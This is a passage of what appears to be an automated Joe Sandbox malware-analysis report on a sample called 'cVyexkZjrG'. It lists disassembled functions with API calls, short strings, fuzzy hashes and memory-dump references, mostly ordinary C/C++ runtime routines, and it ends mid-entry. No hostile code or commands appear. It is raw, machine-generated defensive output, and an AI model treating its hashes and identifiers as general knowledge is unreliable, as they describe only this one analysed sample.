                            • Instruction ID: ad0540d849bb83aad3d6f5330b045be0f71b37e9ee61be24874b6d2cc54d90b8
                            • Opcode Fuzzy Hash: 6a46416cc01c03a2b2a669f58b6bf2f247d969076ba800c258e62cca5f65aab0
                            • Instruction Fuzzy Hash: 9EF08C32A03128FBDF02EB91C919B9F7E7CEB0675AF600064E801E2550EB308E10DA94
                            Function 6CC57327 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog3.LIBCMT ref: 6CC5732E
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6CC57339
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6CC573A7
                              • Part of subcall function 6CC57230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CC57248
                            • std::locale::_Setgloballocale.LIBCPMT ref: 6CC57354
                            • _Yarn.LIBCPMT ref: 6CC5736A
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                            • String ID:
                            • API String ID: 1088826258-0
                            • Opcode ID: 4dc2632c62239d6e102a04ba864df418e42b5810df1aca275a3463dfeba0a75d
                            • Instruction ID: 3ed6c490e51186fef0d8aef073e1cd9e0b3bd5cd59352eeb96adafb9b646f4e9
                            • Opcode Fuzzy Hash: 4dc2632c62239d6e102a04ba864df418e42b5810df1aca275a3463dfeba0a75d
                            • Instruction Fuzzy Hash: C501B1757115109FDB05DF20C8409BD37B5FF86254B954009D90197780EF349AB6DBD9
                            Function 6CCD6E3F Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 452COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $!$@
                            • API String ID: 3519838083-2517134481
                            • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                            • Instruction ID: 5dc9eb295e65b4f55f67d47aa50aee5851e3737dfccd09c8a8a568f9a816bec2
                            • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                            • Instruction Fuzzy Hash: C0127D70D05249DFCF04CFA4C490ADDBBB1BF08308F15846AEA45ABB55EB30B996CB60
                            Function 6CCA2B91 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 284COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog__aulldiv
                            • String ID: $SJ
                            • API String ID: 4125985754-3948962906
                            • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                            • Instruction ID: 8a6f7fbad8f475d915d8b7023755977d9e515703a51f7fe2d3b9ebe9c366640e
                            • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                            • Instruction Fuzzy Hash: 75B16071D0021A9FDB14CF96C8989EEBBF1FF48318F20856ED41AA7B51E7349A46CB50
                            Function 6CB22020 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 6CC57327: __EH_prolog3.LIBCMT ref: 6CC5732E
                              • Part of subcall function 6CC57327: std::_Lockit::_Lockit.LIBCPMT ref: 6CC57339
                              • Part of subcall function 6CC57327: std::locale::_Setgloballocale.LIBCPMT ref: 6CC57354
                              • Part of subcall function 6CC57327: _Yarn.LIBCPMT ref: 6CC5736A
                              • Part of subcall function 6CC57327: std::_Lockit::~_Lockit.LIBCPMT ref: 6CC573A7
                              • Part of subcall function 6CB22F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CB22F95
                              • Part of subcall function 6CB22F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CB22FAF
                              • Part of subcall function 6CB22F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CB22FD0
                              • Part of subcall function 6CB22F60: __Getctype.LIBCPMT ref: 6CB23084
                              • Part of subcall function 6CB22F60: std::_Facet_Register.LIBCPMT ref: 6CB2309C
                              • Part of subcall function 6CB22F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CB230B7
                            • std::ios_base::_Addstd.LIBCPMT ref: 6CB2211B
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 3332196525-1866435925
                            • Opcode ID: f640868891deb91e0ef09169a4e100c7a86e1cf3ffc87ec49732113d88e4fc86
                            • Instruction ID: f87d78c1bba5f1600131528d0a61c80e91382bc52220f01889598d560bb91dad
                            • Opcode Fuzzy Hash: f640868891deb91e0ef09169a4e100c7a86e1cf3ffc87ec49732113d88e4fc86
                            • Instruction Fuzzy Hash: DC41C5B0E013498FDB00CF64C845BAEBBB0FF48318F144268E919AB791E7759995CF91
                            Function 6CCB4EC7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CCB4ECC
                              • Part of subcall function 6CC9F58A: __EH_prolog.LIBCMT ref: 6CC9F58F
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: :hJ$dJ$xJ
                            • API String ID: 3519838083-2437443688
                            • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                            • Instruction ID: 4c77f949d5930e891beec04619a4ad4b5091aed47e7f4d70c3b973e118cb7163
                            • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                            • Instruction Fuzzy Hash: 4121A8B0801B40DFC760DF6AC14429ABBF4BF69718B50C95EC0AA97B51E7B8A608CF55
                            Function 6CC6AD90 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,6CC6B0D0,6CB21DEA,00008000,6CC6B0D0,?,?,?,6CC6AC7F,6CC6B0D0,?,00000000,6CB21DEA), ref: 6CC6ADC9
                            • GetLastError.KERNEL32(?,?,?,6CC6AC7F,6CC6B0D0,?,00000000,6CB21DEA,?,6CC7469E,6CC6B0D0,000000FF,000000FF,00000002,00008000,6CC6B0D0), ref: 6CC6ADD3
                            • __dosmaperr.LIBCMT ref: 6CC6ADDA
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: ErrorFileLastPointer__dosmaperr
                            • String ID: 8Q
                            • API String ID: 2336955059-4022487301
                            • Opcode ID: 605a005ae9ed520bc95c1d8a7466484fa21f50d67a01214b1d2d9e29f33df9f1
                            • Instruction ID: 84781de815f3d2c6516f5e60c40a37c641f63363bd8e014835a331365a475218
                            • Opcode Fuzzy Hash: 605a005ae9ed520bc95c1d8a7466484fa21f50d67a01214b1d2d9e29f33df9f1
                            • Instruction Fuzzy Hash: 8E01D873710525AFCF058F6BCC4589E7B3DEBC63257240249E81197680FB71D9118BA0
                            Function 6CC649B2 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(00000008,?,00000000,6CC68453), ref: 6CC649B7
                            • _free.LIBCMT ref: 6CC64A14
                            • _free.LIBCMT ref: 6CC64A4A
                            • SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 6CC64A55
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: ErrorLast_free
                            • String ID:
                            • API String ID: 2283115069-0
                            • Opcode ID: 13c366d272c22716abac227c6a8fcd8e7501cc75385f559685b97b3936cf5f32
                            • Instruction ID: 9c11e8759f1af38f9d53780246678b1f6ea4d2378904b612ed332e9662c9d976
                            • Opcode Fuzzy Hash: 13c366d272c22716abac227c6a8fcd8e7501cc75385f559685b97b3936cf5f32
                            • Instruction Fuzzy Hash: 9011A332705500BBAA01DABB4EE4D9A35ADABC277CB650629F624E3FC1FF318C595114
                            Function 6CC75EBA Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • WriteConsoleW.KERNEL32(00000000,?,6CC746EC,00000000,00000000,?,6CC74B51,00000000,00000001,00000000,6CC6B0D0,?,6CC6C286,?,?,6CC6B0D0), ref: 6CC75ED1
                            • GetLastError.KERNEL32(?,6CC74B51,00000000,00000001,00000000,6CC6B0D0,?,6CC6C286,?,?,6CC6B0D0,?,6CC6B0D0,?,6CC6BD1C,6CC75AB6), ref: 6CC75EDD
                              • Part of subcall function 6CC75F2E: CloseHandle.KERNEL32(FFFFFFFE,6CC75EED,?,6CC74B51,00000000,00000001,00000000,6CC6B0D0,?,6CC6C286,?,?,6CC6B0D0,?,6CC6B0D0), ref: 6CC75F3E
                            • ___initconout.LIBCMT ref: 6CC75EED
                              • Part of subcall function 6CC75F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CC75EAB,6CC74B3E,6CC6B0D0,?,6CC6C286,?,?,6CC6B0D0,?), ref: 6CC75F22
                            • WriteConsoleW.KERNEL32(00000000,?,6CC746EC,00000000,?,6CC74B51,00000000,00000001,00000000,6CC6B0D0,?,6CC6C286,?,?,6CC6B0D0,?), ref: 6CC75F02
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                            • String ID:
                            • API String ID: 2744216297-0
                            • Opcode ID: 0f04a37856f8a1162337b4527b1d609904b6de31c37a714826bd4585e6aa50e7
                            • Instruction ID: e253eaae12e2d55ae25929c1d4f8e5bc5d730b685e717e84bd5c8f2e03570e40
                            • Opcode Fuzzy Hash: 0f04a37856f8a1162337b4527b1d609904b6de31c37a714826bd4585e6aa50e7
                            • Instruction Fuzzy Hash: 84F0C036601215BBCF235FA5DC0498E3F7AFB0A7A5B094551FB1996620EB32C820DBA0
                            Function 6CC63124 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog3_
                            • String ID: 8Q
                            • API String ID: 2427045233-4022487301
                            • Opcode ID: 16a8b886b2f140e8e415bf7e58e83ca99aff7b3e3e64d8b69f2195f477c8566b
                            • Instruction ID: 61d0783c28409005b05de8eb5d36ec4dbe651ef8ed21daeeeeaf25a39c2181a1
                            • Opcode Fuzzy Hash: 16a8b886b2f140e8e415bf7e58e83ca99aff7b3e3e64d8b69f2195f477c8566b
                            • Instruction Fuzzy Hash: 18719371D052569FDB118B97CAC4AEE7BB5BF45318F1C4229E820A7E40FF758846CB60
                            Function 6CCA8C58 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 213COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CCA8C5D
                              • Part of subcall function 6CCA761A: __EH_prolog.LIBCMT ref: 6CCA761F
                              • Part of subcall function 6CCA7A2E: __EH_prolog.LIBCMT ref: 6CCA7A33
                              • Part of subcall function 6CCA8EA5: __EH_prolog.LIBCMT ref: 6CCA8EAA
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: WZJ
                            • API String ID: 3519838083-1089469559
                            • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                            • Instruction ID: e8e1c0b5bfcfa389db166d1a240d6dc285a4daa062fce985fc04cef269f83a2d
                            • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                            • Instruction Fuzzy Hash: 22816D31D0115ADFCF15DFE4D994ADEBBB4AF14318F10409AE516B77A0EB306A0ACB61
                            Function 6CB228E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                            Download Yara Rule
                            APIs
                            • ___std_exception_destroy.LIBVCRUNTIME ref: 6CB22A76
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: ___std_exception_destroy
                            • String ID: Jbx$Jbx
                            • API String ID: 4194217158-1161259238
                            • Opcode ID: 8a3f074e970dc92f5ed896cd864209f394b2996098d7c29617e6a30d5ee9cc7d
                            • Instruction ID: ee9eedbc04197a3c02616e9ed34ec9a3e077853e4b16c50c3118712f438d4d5f
                            • Opcode Fuzzy Hash: 8a3f074e970dc92f5ed896cd864209f394b2996098d7c29617e6a30d5ee9cc7d
                            • Instruction Fuzzy Hash: 445146B1D002408FCB10CF28C8846AEBBB5FF89324F50856DE849DBB41E335D995CB92
                            Function 6CCD65B2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: CK$CK
                            • API String ID: 3519838083-2096518401
                            • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                            • Instruction ID: 6644b205c568cf89c19727742f47f5e7dc50636248e763b17dbaa96af56c523c
                            • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                            • Instruction Fuzzy Hash: A8518275A00709DFDB10CFA5C880AEEB3B5FB84358F168919EA01E7645E775F906CB60
                            Function 6CC6CEFE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6CC746D6), ref: 6CC6D01B
                            • __dosmaperr.LIBCMT ref: 6CC6D022
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr
                            • String ID: 8Q
                            • API String ID: 1659562826-4022487301
                            • Opcode ID: 77f730dd72fc1e0ee7f3f4a33558cfeda3be183f8ead3faf0e509951cff00713
                            • Instruction ID: 2a2c93c6d4d8e3b0a94b8a58527e375a2d98228f92361d6fab9328adac7abd7b
                            • Opcode Fuzzy Hash: 77f730dd72fc1e0ee7f3f4a33558cfeda3be183f8ead3faf0e509951cff00713
                            • Instruction Fuzzy Hash: 76419771614194AFEB11AF6FCAC0AA97FB4EF46308F644299E8808BE01F3719C128791
                            Function 6CCC4C24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0|J$`)L
                            • API String ID: 3519838083-117937767
                            • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                            • Instruction ID: 18bd89f0eaac35264a6193d465f78ebdcac56fe4c60f21d2ab96143eaeb4153f
                            • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                            • Instruction Fuzzy Hash: E0416D31705785EFCB11DFA4D4907FABBA2FF85308F04846EE15A97A50EB31A905CB92
                            Function 6CCC0906 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$LuJ
                            • API String ID: 3519838083-205571748
                            • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                            • Instruction ID: 5dc618c15d26960579ac225b4658b5423060c0b375243294729b5a290fbef71f
                            • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                            • Instruction Fuzzy Hash: 340180B2E01349DADB10DFA984806AEF7B4FF59708F40842EE569F3A50D3749904CB9A
                            Function 6CC6DD28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44memoryCOMMON
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 6CC6DD49
                            • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6CC6A63A,?,00000004,?,4B42FCB6,?,?,6CC5F78C,4B42FCB6,?), ref: 6CC6DD85
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: AllocHeap_free
                            • String ID: 8Q
                            • API String ID: 1080816511-4022487301
                            • Opcode ID: 76f374b267089a50c9d38a85e41fc899dc5f59b343d17288896d449baadf590c
                            • Instruction ID: 16d01e6caf5d662b2d954fabe989588e8c4fc2e0c156c7e91d303531389baaf1
                            • Opcode Fuzzy Hash: 76f374b267089a50c9d38a85e41fc899dc5f59b343d17288896d449baadf590c
                            • Instruction Fuzzy Hash: 51F0AF326112056ADB216A27EEC0A9A37689F836A8F354196E9149BE90FB20D401C1F4
                            Function 6CCEC5D5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: p/K$J
                            • API String ID: 3519838083-2069324279
                            • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                            • Instruction ID: 43fc223ef6c45e7e93662e2851f10d40de78d585b1ae1846c9a8657820d92568
                            • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                            • Instruction Fuzzy Hash: 6701BCB1A117119FD724CF59C5047AABBF8EF85729F10C85E9062A3B40D7F8A5088BA4
                            Function 6CCCAFC7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CCCAFCC
                              • Part of subcall function 6CCCA4D1: __EH_prolog.LIBCMT ref: 6CCCA4D6
